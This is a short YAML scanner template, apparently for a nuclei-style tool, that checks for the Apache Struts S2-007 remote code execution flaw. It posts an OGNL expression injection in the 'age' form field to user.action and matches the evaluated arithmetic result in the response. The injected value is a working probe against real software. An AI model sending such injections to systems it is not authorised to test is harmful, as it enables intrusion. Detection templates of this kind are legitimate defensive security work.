id: struct-s2-007
info:
  name: Apache Struct S2-007 - RCE
  risk: High

requests:
  - method: POST
    redirect: false
    url: >-
      {{.BaseURL}}{{.Path}}/user.action
    headers:
      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
      - Content-Type: application/x-www-form-urlencoded
    body: >-
      name=111&email=11&age=%27+%2B+%28191191191*7%29+%2B+%27
    detections:
      - >-
        StatusCode() == 200 && StringSearch("response", "1338338337")

reference:
  author: theblackturtle
